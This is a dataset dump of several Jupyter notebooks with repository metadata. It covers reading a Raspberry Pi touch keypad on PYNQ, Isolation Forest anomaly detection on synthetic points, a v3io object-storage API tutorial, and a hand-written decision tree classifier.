[
"## Reading Values from Touch Keypad\n\nThis demonstration shows how to interact with the Raspberry Pi Touch Keypad.\nThe Raspberry Pi Touch Keypad is required (https://www.seeedstudio.com/Raspberry-Pi-Touch-Keypad-p-2772.html).\n\n\n\nThe Raspberry Pi touch keypad supports up to 16 keys with adjustable \nsensitivity and built-in LD0.\nTouch keypad is read only, and has IIC interface\nconnected to SDA1 and SCL1 on the Raspberry Pi interface.\nThe I2C will read 2 bytes of data: `Data_0` and `Data_1`.\n* `Data_0`: B7 ~ B0 is TP0 ~ TP7 on/off status. 0 is key off, 1 is key on.\n* `Data_1`: B7 ~ B0 is TP8 ~ TP15 on/off status. 0 is key off, 1 is key on.\n\n### 1. Prepare the overlay\nDownload the overlay first, then select the shared pin to be connected to\nRPI header (by default, the pins will be connected to PMODA instead).",
"_____no_output_____"
]
],
[
[
"from pynq.overlays.base import BaseOverlay\n\nbase = BaseOverlay(\"base.bit\")\nbase.select_rpi()",
"_____no_output_____"
]
],
[
[
"### 2. Instantiate the Microblaze\nThe Microblaze will control the pins on the RASPBERRYPI header.",
"_____no_output_____"
]
],
[
[
"%%microblaze base.RPI\n\n#include \"xio_switch.h\"\n#include \"circular_buffer.h\"\n#include \"i2c.h\"\n\n// Device constants\n#define TOUCHPAD_DEV_ADDRESS 0x57\n\nunsigned int get_touchpad_reg_value(){\n uint8_t data[2];\n i2c device = i2c_open_device(1);\n set_pin(2, SDA1);\n set_pin(3, SCL1);\n i2c_read(device, TOUCHPAD_DEV_ADDRESS, data, 2);\n return (unsigned int) ((data[0] << 8) + data[1]);\n}",
"_____no_output_____"
]
],
[
[
"### 3. Read the key values\nThe available pin names are listed below.",
"_____no_output_____"
]
],
[
[
"PIN_MAPPING = {'circle': 0,\n 'cross': 1,\n 'square': 2,\n 'r': 3,\n 'home': 4,\n '+': 5,\n '-': 6,\n 'l': 7,\n 'down': 8,\n 'right': 9,\n 'up': 10,\n 'left': 11,\n 'power': 12,\n 'rpi': 13,\n 'logo': 14,\n 'triangle': 15\n }",
"_____no_output_____"
]
],
[
[
"To convert the raw data into the value for each key, we define the following\nfunctions.",
"_____no_output_____"
]
],
[
[
"def reg2int(reg_value, key_number):\n return \"{0:b}\".format(reg_value).zfill(16)[-(key_number+1)]\n\ndef get_touchpad(key_name):\n reg_value = get_touchpad_reg_value()\n key_number = PIN_MAPPING[key_name]\n return reg2int(reg_value, key_number)",
"_____no_output_____"
]
],
[
[
"Run the following code without pressing any button.",
"_____no_output_____"
]
],
[
[
"get_touchpad('home')",
"_____no_output_____"
]
],
[
[
"While pressing gently on the home button of the touch keypad, run the following code.",
"_____no_output_____"
]
],
[
[
"get_touchpad('home')",
"_____no_output_____"
]
],
[
[
"While pressing the right arrow and square at the same time, \nrun the following code. Note that there are 2 read commands issued,\nalthough 1 read command can get values for all the keys.",
"_____no_output_____"
]
],
[
[
"for key in ['right', 'square']:\n print('Key {} reads value {}.'.format(key, get_touchpad(key)))",
"Key right reads value 1.\nKey square reads value 1.\n"
]
],
[
[
"### 4. Cleanup\nSwitch back the connection on the shared pin to PMODA header.",
"_____no_output_____"
]
],
[
[
"base.select_pmoda()",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
e706cf9a1a7168854cdb72ffe500464e3eee29a8 | 115,697 | ipynb | Jupyter Notebook | Chapter01/Anomaly Detection with Isolation Forest/Anomaly_Detection_with_Isolation_Forest.ipynb | Browin123/Cybersecurity | 12f544fb0ea954dfbf804f4d67f148218eb58beb | [
"MIT"
] | 1 | 2021-01-05T13:33:20.000Z | 2021-01-05T13:33:20.000Z | Chapter01/Anomaly Detection with Isolation Forest/Anomaly_Detection_with_Isolation_Forest.ipynb | urantialife/Machine-Learning-for-Cybersecurity-Cookbook | 998fdd00b210f8203d906ff05b99908b001bf3a3 | [
"MIT"
] | 1 | 2021-06-11T18:04:48.000Z | 2021-06-11T18:04:48.000Z | Chapter01/Anomaly Detection with Isolation Forest/Anomaly_Detection_with_Isolation_Forest.ipynb | urantialife/Machine-Learning-for-Cybersecurity-Cookbook | 998fdd00b210f8203d906ff05b99908b001bf3a3 | [
"MIT"
] | null | null | null | 281.501217 | 35,952 | 0.913844 | [
[
[
"import numpy as np\nimport pandas as pd\n\nrandom_seed = np.random.RandomState(12)",
"_____no_output_____"
],
[
"X_train = 0.5 * random_seed.randn(500, 2)\nX_train = np.r_[X_train + 3, X_train]\nX_train = pd.DataFrame(X_train, columns=[\"x\", \"y\"])",
"_____no_output_____"
],
[
"X_test = 0.5 * random_seed.randn(500, 2)\nX_test = np.r_[X_test + 3, X_test]\nX_test = pd.DataFrame(X_test, columns=[\"x\", \"y\"])",
"_____no_output_____"
],
[
"X_outliers = random_seed.uniform(low=-5, high=5, size=(50, 2))\nX_outliers = pd.DataFrame(X_outliers, columns=[\"x\", \"y\"])",
"_____no_output_____"
],
[
"%matplotlib inline\nimport matplotlib.pyplot as plt\n\np1 = plt.scatter(X_train.x, X_train.y, c=\"white\", s=50, edgecolor=\"black\")\np2 = plt.scatter(X_test.x, X_test.y, c=\"green\", s=50, edgecolor=\"black\")\np3 = plt.scatter(X_outliers.x, X_outliers.y, c=\"blue\", s=50, edgecolor=\"black\")\nplt.xlim((-6, 6))\nplt.ylim((-6, 6))\nplt.legend(\n [p1, p2, p3],\n [\"training set\", \"normal testing set\", \"anomalous testing set\"],\n loc=\"lower right\",\n)\n\nplt.show()",
"_____no_output_____"
],
[
"from sklearn.ensemble import IsolationForest\n\nclf = IsolationForest()\nclf.fit(X_train)\ny_pred_train = clf.predict(X_train)\ny_pred_test = clf.predict(X_test)\ny_pred_outliers = clf.predict(X_outliers)",
"/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/sklearn/ensemble/iforest.py:213: FutureWarning: default contamination parameter 0.1 will change in version 0.22 to \"auto\". This will change the predict method behavior.\n FutureWarning)\n/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/sklearn/ensemble/iforest.py:223: FutureWarning: behaviour=\"old\" is deprecated and will be removed in version 0.22. Please use behaviour=\"new\", which makes the decision_function change to match other anomaly detection algorithm API.\n FutureWarning)\n/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/sklearn/ensemble/iforest.py:417: DeprecationWarning: threshold_ attribute is deprecated in 0.20 and will be removed in 0.22.\n \" be removed in 0.22.\", DeprecationWarning)\n/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/sklearn/ensemble/iforest.py:417: DeprecationWarning: threshold_ attribute is deprecated in 0.20 and will be removed in 0.22.\n \" be removed in 0.22.\", DeprecationWarning)\n/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/sklearn/ensemble/iforest.py:417: DeprecationWarning: threshold_ attribute is deprecated in 0.20 and will be removed in 0.22.\n \" be removed in 0.22.\", DeprecationWarning)\n"
],
[
"X_outliers = X_outliers.assign(pred=y_pred_outliers)\nX_outliers.head()",
"_____no_output_____"
],
[
"p1 = plt.scatter(X_train.x, X_train.y, c=\"white\", s=50, edgecolor=\"black\")\np2 = plt.scatter(\n X_outliers.loc[X_outliers.pred == -1, [\"x\"]],\n X_outliers.loc[X_outliers.pred == -1, [\"y\"]],\n c=\"blue\",\n s=50,\n edgecolor=\"black\",\n)\np3 = plt.scatter(\n X_outliers.loc[X_outliers.pred == 1, [\"x\"]],\n X_outliers.loc[X_outliers.pred == 1, [\"y\"]],\n c=\"red\",\n s=50,\n edgecolor=\"black\",\n)\n\nplt.xlim((-6, 6))\nplt.ylim((-6, 6))\nplt.legend(\n [p1, p2, p3],\n [\"training observations\", \"detected outliers\", \"incorrectly labeled outliers\"],\n loc=\"lower right\",\n)\n\nplt.show()",
"_____no_output_____"
],
[
"X_test = X_test.assign(pred=y_pred_test)\nX_test.head()",
"_____no_output_____"
],
[
"p1 = plt.scatter(X_train.x, X_train.y, c=\"white\", s=50, edgecolor=\"black\")\np2 = plt.scatter(\n X_test.loc[X_test.pred == 1, [\"x\"]],\n X_test.loc[X_test.pred == 1, [\"y\"]],\n c=\"blue\",\n s=50,\n edgecolor=\"black\",\n)\np3 = plt.scatter(\n X_test.loc[X_test.pred == -1, [\"x\"]],\n X_test.loc[X_test.pred == -1, [\"y\"]],\n c=\"red\",\n s=50,\n edgecolor=\"black\",\n)\n\nplt.xlim((-6, 6))\nplt.ylim((-6, 6))\nplt.legend(\n [p1, p2, p3],\n [\n \"training observations\",\n \"correctly labeled test observations\",\n \"incorrectly labeled test observations\",\n ],\n loc=\"lower right\",\n)\n\nplt.show()",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
e706da6ed8f2e3c3e4631158a445cd86c3eb7602 | 15,206 | ipynb | Jupyter Notebook | data-ingestion-and-preparation/v3io-objects.ipynb | jasonnIguazio/tutorials | ee8e819137493fdd25a220c0ac524eaa3b27ea5e | [
"Apache-2.0"
] | 33 | 2019-02-11T17:02:57.000Z | 2022-03-07T19:39:47.000Z | data-ingestion-and-preparation/v3io-objects.ipynb | jasonnIguazio/tutorials | ee8e819137493fdd25a220c0ac524eaa3b27ea5e | [
"Apache-2.0"
] | 88 | 2019-03-27T22:18:14.000Z | 2021-01-28T12:22:52.000Z | data-ingestion-and-preparation/v3io-objects.ipynb | jasonnIguazio/tutorials | ee8e819137493fdd25a220c0ac524eaa3b27ea5e | [
"Apache-2.0"
] | 36 | 2019-01-03T14:08:56.000Z | 2022-03-22T16:30:06.000Z | 27.697632 | 313 | 0.572866 | [
[
[
"# Using the Platform's Data-Object API",
"_____no_output_____"
],
[
"The platform's Simple-Object API enables performing simple data-object operations that resembles Amazon’s Simple Storage Service (S3) API.\nIn addition to the S3-like capabilities, the Simple-Object Web API enables appending data to existing objects.",
"_____no_output_____"
],
[
"> **Note**: The Python API for accessing the data objects is provided as tech preview and is included in the current release as a sneak peek to future release features but without official support in this release.\n> Note that tech-preview features don't go through QA cycles and might result in unexpected behavior.\n> Please consult the Iguazio support team before using these features.\n> As an alternative, you can use the [data-object operations REST API](https://www.iguazio.com/docs/v3.0/data-layer/reference/web-apis/simple-object-web-api/data-object-operations/) which offers equivalent functionality and is officially supported.",
"_____no_output_____"
],
[
"## Initialize",
"_____no_output_____"
]
],
[
[
"import v3io.dataplane",
"_____no_output_____"
]
],
[
[
"Create a `dataplane` client:",
"_____no_output_____"
]
],
[
[
"v3io_client = v3io.dataplane.Client()",
"_____no_output_____"
]
],
[
[
"> **Note**: You can pass to the client the `endpoint` and `access_key` parameters explicitly.\n> The following code is equivalent to the default values:\n>\n> ``` python\n> from os import getenv\n> v3io_client = v3io.dataplane.Client(endpoint='http://v3io-webapi:8081',\n> access_key=getenv('V3IO_ACCESS_KEY'))\n> ```\n>\n> When running the code remotely, you can obtain the URL of your cluster by copying the API URL of the web-APIs service (`webapi`) from the **Services** dashboard page. You can select between two types of URLs:\n>\n> - **HTTPS Direct** (recommended) — a URL of the format `https://<tenant IP>:<web-APIs port>`; for example, `https://default-tenant.app.mycluster.iguazio.com:8443`.\n> - **HTTPS** — a URL of the format `https://webapi.<tenant IP>`; for example, `https://webapi.default-tenant.app.mycluster.iguazio.com`.\n>\n> For more information see the [Data-Service Web-API General Structure](https://www.iguazio.com/docs/v3.0/data-layer/reference/web-apis/data-service-web-api-gen-struct/) documentation.",
"_____no_output_____"
],
[
"> **Number of maximum parallel connections**: Another noteworthy parameter is `max_connections`, which defines the number of maximum parallel connections when performing batch operations.\n> If left unspecified, the default is 8 connections.\n> For more information see the [Put Multiple Objects](#Put-Multiple-Objects) section in this tutorial.",
"_____no_output_____"
],
[
"### Set the Data Path",
"_____no_output_____"
],
[
"All data in the platform is stored in user-defined data containers.\nThis tutorial uses the predefined \"users\" container.\nFor more information refer to the platform's [data-containers](https://www.iguazio.com/docs/v3.0/data-layer/containers/) documentation.",
"_____no_output_____"
]
],
[
[
"CONTAINER = 'users'",
"_____no_output_____"
]
],
[
[
"Set the data path for storing the NoSQL (KV) table:",
"_____no_output_____"
]
],
[
[
"from os import getenv, path\n\nV3IO_USERNAME = getenv('V3IO_USERNAME')\nOBJECTS_PATH = path.join(V3IO_USERNAME, 'examples', 'v3io', 'objects')",
"_____no_output_____"
]
],
[
[
"## Put Object",
"_____no_output_____"
],
[
"Use the `put` method to adds a new object:",
"_____no_output_____"
]
],
[
[
"text = \"It was the best of times,\\n\\\nit was the worst of times,\\n\\\nit was the age of wisdom,\\n\\\nit was the age of foolishness,\\n\\\nit was the epoch of belief,\\n\\\nit was the epoch of incredulity,\\n\\\n\" ",
"_____no_output_____"
],
[
"OBJECT = path.join(OBJECTS_PATH, 'The Period.txt')\nprint(f'Writing to {OBJECT}')\nresponse = v3io_client.object.put(container=CONTAINER, path=OBJECT, body=text)\nprint(f'Status code: {response.status_code}')",
"Writing to iguazio/examples/v3io/objects/The Period.txt\nStatus code: 200\n"
]
],
[
[
"## Get Object",
"_____no_output_____"
],
[
"Use the `get` method to retrieve an object:",
"_____no_output_____"
]
],
[
[
"response = v3io_client.object.get(container=CONTAINER, path=OBJECT)\nprint(response.body.decode('utf-8'))",
"It was the best of times,\nit was the worst of times,\nit was the age of wisdom,\nit was the age of foolishness,\nit was the epoch of belief,\nit was the epoch of incredulity,\n\n"
]
],
[
[
"## Append",
"_____no_output_____"
],
[
"You can also use the `put` to append data to an existing object.\n\n> **Note**: The option to append data extends the capabilities of the AWS S3 `PUT Object` operation.",
"_____no_output_____"
]
],
[
[
"text2=\"it was the season of Light,\\n\\\nit was the season of Darkness,\\n\\\nit was the spring of hope,\\n\\\nit was the winter of despair,\\n\\\n\"",
"_____no_output_____"
],
[
"response = v3io_client.object.put(container=CONTAINER, path=OBJECT, body=text2, append=True)\nprint(f'Status code: {response.status_code}')",
"Status code: 200\n"
],
[
"response = v3io_client.object.get(container=CONTAINER, path=OBJECT)\nprint(response.body.decode('utf-8'))",
"It was the best of times,\nit was the worst of times,\nit was the age of wisdom,\nit was the age of foolishness,\nit was the epoch of belief,\nit was the epoch of incredulity,\nit was the season of Light,\nit was the season of Darkness,\nit was the spring of hope,\nit was the winter of despair,\n\n"
]
],
[
[
"## Delete Object",
"_____no_output_____"
],
[
"Use the `delete` method to delete an object:",
"_____no_output_____"
]
],
[
[
"response = v3io_client.object.delete(container=CONTAINER, path=OBJECT)\nprint(response.status_code)",
"204\n"
]
],
[
[
"## Put Multiple Objects",
"_____no_output_____"
],
[
"To get the highest possible throughput, you can send many requests towards the data layer and wait for all the responses to arrive (rather than send each request and wait for the response).\nThe SDK supports this through batching.\nAny API call can be made through the client's built in `batch` object.\nThe API call receives the exact same arguments it would normally receive (except for `raise_for_status`), and does not block until the response arrives.\nTo wait for all pending responses, call the `wait` method of the `batch` object.",
"_____no_output_____"
],
[
"> **Note**: The number of parallel connections is determined by the `max_connections` parameter when you created the client. For instance, to set 16 parallel connections you should have in the beginning of the notebook `v3io_client = v3io.dataplane.Client(max_connections=16)`. The default is 8 connections.",
"_____no_output_____"
]
],
[
[
"# Template of word sequence\n\nnouns = ['time', 'person', 'year', 'way', 'day', 'thing', 'man', 'world', 'life', 'hand', 'part', 'child', 'eye', 'woman', 'place', 'work', 'week', 'case', 'point', 'government', 'company', 'number', 'group', 'problem', 'fact']\nadjectives = ['good', 'new', 'first', 'last', 'long', 'great', 'little', 'own', 'other', 'old', 'right', 'big', 'high', 'different', 'small', 'large', 'next', 'early', 'young', 'important', 'few', 'public', 'bad', 'same', 'able']\nprepositions = ['to', 'of', 'in', 'for', 'on', 'with', 'at', 'by', 'from', 'up', 'about', 'into', 'over', 'after']\nothers = ['the', 'that', 'this', 'my', 'one']\n\nsequence = [nouns, prepositions, others, adjectives, nouns]",
"_____no_output_____"
],
[
"import random\n\nrandom.seed(42)\n\n# Generate a sequence of words\n\nfor i in range(10):\n generated_text = \" \".join([random.choice(values) for values in sequence])\n print(generated_text)\n v3io_client.batch.object.put(container=CONTAINER, path=path.join(OBJECTS_PATH, f'obj_{i:02}'), body=generated_text)\n\n# Wait for all writes to complete\nresponses = v3io_client.batch.wait()",
"company of the same life\nworld for that same way\nnumber into one first point\nwoman to the first man\nworld from one good case\nman into one different world\nplace up this good fact\nthing into my right life\nday for this last year\neye of this big government\n"
]
],
[
[
"The looped `put` interface in the previous code block sends all `put` requests to the data layer in parallel.\nWhen `wait` is called, it blocks until either all responses arrive — in which case it returns a `Responses` object that contains the `responses` of each call — or an error occurs — in which case an exception is thrown.\nYou can pass `raise_for_status` to `wait`, and it behaves as previously explained.\n\n> **Note:** The `batch` object is stateful, therefore you can only create one batch at a time.\n> However, you can create multiple parallel batches yourself through the client's `create_batch` interface.",
"_____no_output_____"
],
[
"Display the contents of the first object:",
"_____no_output_____"
]
],
[
[
"response = v3io_client.object.get(container=CONTAINER, path=path.join(OBJECTS_PATH, 'obj_00'))\nprint(response.body.decode('utf-8'))",
"company of the same life\n"
]
],
[
[
"Use the file system to list the new objects:",
"_____no_output_____"
]
],
[
[
"from os import sep\nimport pathlib\n\nV3IO_OBJECTS_PATH = path.join(sep, 'v3io', CONTAINER, OBJECTS_PATH)\n\nprint(f\"obj_* files in {V3IO_OBJECTS_PATH}:\")\nfor file in pathlib.Path(V3IO_OBJECTS_PATH).glob(\"obj_*\"):\n print(file.name)",
"obj_* files in /v3io/users/iguazio/examples/v3io/objects:\nobj_00\nobj_01\nobj_02\nobj_03\nobj_04\nobj_05\nobj_06\nobj_07\nobj_08\nobj_09\n"
]
],
[
[
"## Delete the Objects",
"_____no_output_____"
],
[
"You can use the file-system interface to delete a objects directory from the relevant data container:",
"_____no_output_____"
]
],
[
[
"import shutil\nshutil.rmtree(V3IO_OBJECTS_PATH)",
"_____no_output_____"
]
],
[
[
"Alternatively, you can use the following command:",
"_____no_output_____"
]
],
[
[
"!rm -r $V3IO_OBJECTS_PATH",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
e706daf7df4ee3b56babee26d31d653a9f6cbf81 | 29,321 | ipynb | Jupyter Notebook | Project Decision Tree.ipynb | Atulmishra1596/Decision-Tree-Impplementation | da8ef083cab61417d89b383df40e55a6fea07ef8 | [
"MIT"
] | null | null | null | Project Decision Tree.ipynb | Atulmishra1596/Decision-Tree-Impplementation | da8ef083cab61417d89b383df40e55a6fea07ef8 | [
"MIT"
] | null | null | null | Project Decision Tree.ipynb | Atulmishra1596/Decision-Tree-Impplementation | da8ef083cab61417d89b383df40e55a6fea07ef8 | [
"MIT"
] | null | null | null | 39.094667 | 211 | 0.478735 | [
[
[
"class TreeNode:\n def __init__(self, data,output):\n # data represents the feature upon which the node was split when fitting the training data\n # data = None for leaf node\n self.data = data\n # children of a node are stored as a dicticionary with key being the value of feature upon which the node was split\n # and the corresponding value stores the child TreeNode\n self.children = {}\n # output represents the class with current majority at this instance of the decision tree\n self.output = output\n # index will be used to assign a unique index to each node\n self.index = -1\n \n def add_child(self,feature_value,obj):\n self.children[feature_value] = obj",
"_____no_output_____"
],
[
"from sklearn import datasets\nfrom sklearn.model_selection import train_test_split\ndata=datasets.load_iris()\ndata\nx=data.data\ny=data.target\nx_train,x_test,y_train,y_test=train_test_split(x,y)",
"_____no_output_____"
],
[
"class DecisionTreeClassifier:\n def __init__(self):\n # root represents the root node of the decision tree built after fitting the training data\n self.__root = None\n\n def __count_unique(self,Y):\n # returns a dictionary with keys as unique values of Y(i.e no of classes) and the corresponding value as its frequency\n d = {}\n for i in Y:\n if i not in d:\n d[i]=1\n else:\n d[i]+=1\n return d\n\n\n def __entropy(self,Y):\n # returns the entropy \n freq_map = self.__count_unique(Y)\n entropy_ = 0\n total = len(Y)\n for i in freq_map:\n p = freq_map[i]/total\n entropy_ += (-p)*math.log2(p)\n return entropy_\n\n def __gain_ratio(self,X,Y,selected_feature):\n # returns the gain ratio\n info_orig = self.__entropy(Y) # info_orig represents entropy before splitting\n info_f = 0 # info_f represents entropy after splitting upon the selected feature\n split_info = 0\n values = set(X[:,selected_feature])\n df = pd.DataFrame(X)\n # Adding Y values as the last column in the dataframe \n df[df.shape[1]] = Y\n initial_size = df.shape[0] \n for i in values:\n df1 = df[df[selected_feature] == i]\n current_size = df1.shape[0]\n info_f += (current_size/initial_size)*self.__entropy(df1[df1.shape[1]-1])\n split_info += (-current_size/initial_size)*math.log2(current_size/initial_size)\n\n # to handle the case when split info = 0 which leads to division by 0 error\n if split_info == 0 :\n return math.inf\n\n info_gain = info_orig - info_f\n gain_ratio = info_gain / split_info\n return gain_ratio\n\n def __gini_index(self,Y):\n # returns the gini index \n freq_map = self.__count_unique(Y)\n gini_index_ = 1\n total = len(Y)\n for i in freq_map:\n p = freq_map[i]/total\n gini_index_ -= p**2\n return gini_index_\n\n def __gini_gain(self,X,Y,selected_feature):\n # returns the gini gain\n gini_orig = self.__gini_index(Y) # gini_orig represents gini index before splitting\n gini_split_f = 0 # gini_split_f represents gini index after splitting upon the selected feature\n values = set(X[:,selected_feature])\n df = pd.DataFrame(X)\n # Adding Y values as the last column in the dataframe \n df[df.shape[1]] = Y\n initial_size = df.shape[0] \n for i in values:\n df1 = df[df[selected_feature] == i]\n current_size = df1.shape[0]\n gini_split_f += (current_size/initial_size)*self.__gini_index(df1[df1.shape[1]-1])\n\n gini_gain_ = gini_orig - gini_split_f\n return gini_gain_\n\n\n def __decision_tree(self,X,Y,features,level,metric,classes):\n # returns the root of the Decision Tree(which consists of TreeNodes) built after fitting the training data\n # Here Nodes are printed as in PREORDER traversl\n # classes represents the different classes present in the classification problem \n # metric can take value gain_ratio or gini_index\n # level represents depth of the tree\n # We split a node on a particular feature only once (in a given root to leaf node path)\n \n \n # If the node consists of only 1 class\n if len(set(Y)) == 1:\n print(\"Level\",level)\n output = None\n for i in classes:\n if i in Y:\n output = i\n print(\"Count of\",i,\"=\",len(Y))\n else :\n print(\"Count of\",i,\"=\",0)\n if metric == \"gain_ratio\":\n print(\"Current Entropy is = 0.0\")\n elif metric == \"gini_index\":\n print(\"Current Gini Index is = 0.0\")\n\n print(\"Reached leaf Node\")\n print()\n return TreeNode(None,output)\n\n # If we have run out of features to split upon\n # In this case we will output the class with maximum count\n if len(features) == 0:\n print(\"Level\",level)\n freq_map = self.__count_unique(Y)\n output = None\n max_count = -math.inf\n for i in classes:\n if i not in freq_map:\n print(\"Count of\",i,\"=\",0)\n else :\n if freq_map[i] > max_count :\n output = i\n max_count = freq_map[i]\n print(\"Count of\",i,\"=\",freq_map[i])\n\n if metric == \"gain_ratio\":\n print(\"Current Entropy is =\",self.__entropy(Y))\n elif metric == \"gini_index\":\n print(\"Current Gini Index is =\",self.__gini_index(Y)) \n\n print(\"Reached leaf Node\")\n print()\n return TreeNode(None,output)\n\n \n # Finding the best feature to split upon\n max_gain = -math.inf\n final_feature = None\n for f in features :\n if metric == \"gain_ratio\":\n current_gain = self.__gain_ratio(X,Y,f)\n elif metric ==\"gini_index\":\n current_gain = self.__gini_gain(X,Y,f)\n\n if current_gain > max_gain:\n max_gain = current_gain\n final_feature = f\n\n print(\"Level\",level)\n freq_map = self.__count_unique(Y)\n output = None\n max_count = -math.inf\n\n for i in classes:\n if i not in freq_map:\n print(\"Count of\",i,\"=\",0)\n else :\n if freq_map[i] > max_count :\n output = i\n max_count = freq_map[i]\n print(\"Count of\",i,\"=\",freq_map[i])\n\n if metric == \"gain_ratio\" : \n print(\"Current Entropy is =\",self.__entropy(Y))\n print(\"Splitting on feature X[\",final_feature,\"] with gain ratio \",max_gain,sep=\"\")\n print()\n elif metric == \"gini_index\":\n print(\"Current Gini Index is =\",self.__gini_index(Y))\n print(\"Splitting on feature X[\",final_feature,\"] with gini gain \",max_gain,sep=\"\")\n print()\n\n \n unique_values = set(X[:,final_feature]) # unique_values represents the unique values of the feature selected\n df = pd.DataFrame(X)\n # Adding Y values as the last column in the dataframe\n df[df.shape[1]] = Y\n\n current_node = TreeNode(final_feature,output)\n\n # Now removing the selected feature from the list as we do not want to split on one feature more than once(in a given root to leaf node path)\n index = features.index(final_feature)\n features.remove(final_feature)\n for i in unique_values:\n # Creating a new dataframe with value of selected feature = i\n df1 = df[df[final_feature] == i]\n # Segregating the X and Y values and recursively calling on the splits\n node = self.__decision_tree(df1.iloc[:,0:df1.shape[1]-1].values,df1.iloc[:,df1.shape[1]-1].values,features,level+1,metric,classes)\n current_node.add_child(i,node)\n\n # Add the removed feature \n features.insert(index,final_feature)\n\n return current_node\n \n def fit(self,X,Y,metric=\"gain_ratio\"):\n # Fits to the given training data\n # metric can take value gain_ratio or gini_index\n features = [i for i in range(len(X[0]))]\n classes = set(Y)\n level = 0\n if metric != \"gain_ratio\" :\n if metric != \"gini_index\":\n metric=\"gain_ratio\" # if user entered a value which was neither gini_index nor gain_ratio\n self.__root = self.__decision_tree(X,Y,features,level,metric,classes)\n \n def __predict_for(self,data,node):\n # predicts the class for a given testing point and returns the answer\n \n # We have reached a leaf node\n if len(node.children) == 0 :\n return node.output\n\n val = data[node.data] # represents the value of feature on which the split was made \n if val not in node.children :\n return node.output\n \n # Recursively call on the splits\n return self.__predict_for(data,node.children[val])\n\n def predict(self,X):\n # This function returns Y predicted\n # X should be a 2-D np array\n Y = np.array([0 for i in range(len(X))])\n for i in range(len(X)):\n Y[i] = self.__predict_for(X[i],self.__root)\n return Y\n \n def score(self,X,Y):\n # returns the mean accuracy\n Y_pred = self.predict(X)\n count = 0\n for i in range(len(Y_pred)):\n if Y_pred[i] == Y[i]:\n count+=1\n return count/len(Y_pred)\n \n def export_tree_pdf(self,filename=None):\n # returns the tree as dot data\n # if filename is specified the function \n # will save the pdf file in current directory which consists of the visual reresentation of the tree\n import pydotplus\n from collections import deque\n \n dot_data = '''digraph Tree {\nnode [shape=box] ;'''\n \n queue = deque()\n \n r = self.__root\n queue.append(r)\n count = 0\n if r.index == -1:\n r.index = count\n \n dot_data = dot_data + \"\\n{} [label=\\\"Feature to split upon : X[{}]\\\\nOutput at this node : {}\\\" ];\".format(count,r.data,r.output) \n \n # Doing LEVEL ORDER traversal in the tree (using a queue)\n while len(queue) != 0 :\n node = queue.popleft()\n for i in node.children:\n count+=1\n if(node.children[i].index==-1):\n node.children[i].index = count\n \n # Creating child node\n dot_data = dot_data + \"\\n{} [label=\\\"Feature to split upon : X[{}]\\\\nOutput at this node : {}\\\" ];\".format(node.children[i].index,node.children[i].data,node.children[i].output) \n # Connecting parent node with child\n dot_data = dot_data + \"\\n{} -> {} [ headlabel=\\\"Feature value = {}\\\"]; \".format(node.index,node.children[i].index,i)\n # Adding child node to queue\n queue.append(node.children[i])\n \n dot_data = dot_data + \"\\n}\"\n\n if filename != None: \n graph = pydotplus.graph_from_dot_data(dot_data)\n graph.write_pdf(filename) \n \n return dot_data",
"_____no_output_____"
],
[
"import math\nimport pandas as pd\nimport numpy as np\nclf = DecisionTreeClassifier()\nclf.fit(x_train,y_train,metric='gini_index')\nY_pred = clf.predict(x_test)\nprint(\"Predictions : \",Y_pred)\nprint()\nour_score = clf.score(x_train,y_train)\nprint(\"Score :\",our_score) # score on training data\nprint()\nprint(\"DOT DATA :-\",clf.export_tree_pdf(filename=\"tree_sample_dataset.pdf\"))",
"Level 0\nCount of 0 = 39\nCount of 1 = 35\nCount of 2 = 38\nCurrent Gini Index is = 0.6659757653061225\nSplitting on feature X[3] with gini gain 0.613035649866007\n\nLevel 1\nCount of 0 = 22\nCount of 1 = 0\nCount of 2 = 0\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 1\nCount of 0 = 0\nCount of 1 = 1\nCount of 2 = 1\nCurrent Gini Index is = 0.5\nSplitting on feature X[0] with gini gain 0.5\n\nLevel 2\nCount of 0 = 0\nCount of 1 = 0\nCount of 2 = 1\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 2\nCount of 0 = 0\nCount of 1 = 1\nCount of 2 = 0\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 1\nCount of 0 = 0\nCount of 1 = 0\nCount of 2 = 2\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 1\nCount of 0 = 0\nCount of 1 = 10\nCount of 2 = 0\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 1\nCount of 0 = 0\nCount of 1 = 3\nCount of 2 = 0\nCurrent Gini Index is = 0.0\nReached leaf Node\n\nLevel 1\nCount of 0 = 1\nCount of 1 = 0\nCount of 2 = 0\nCurrent Gini 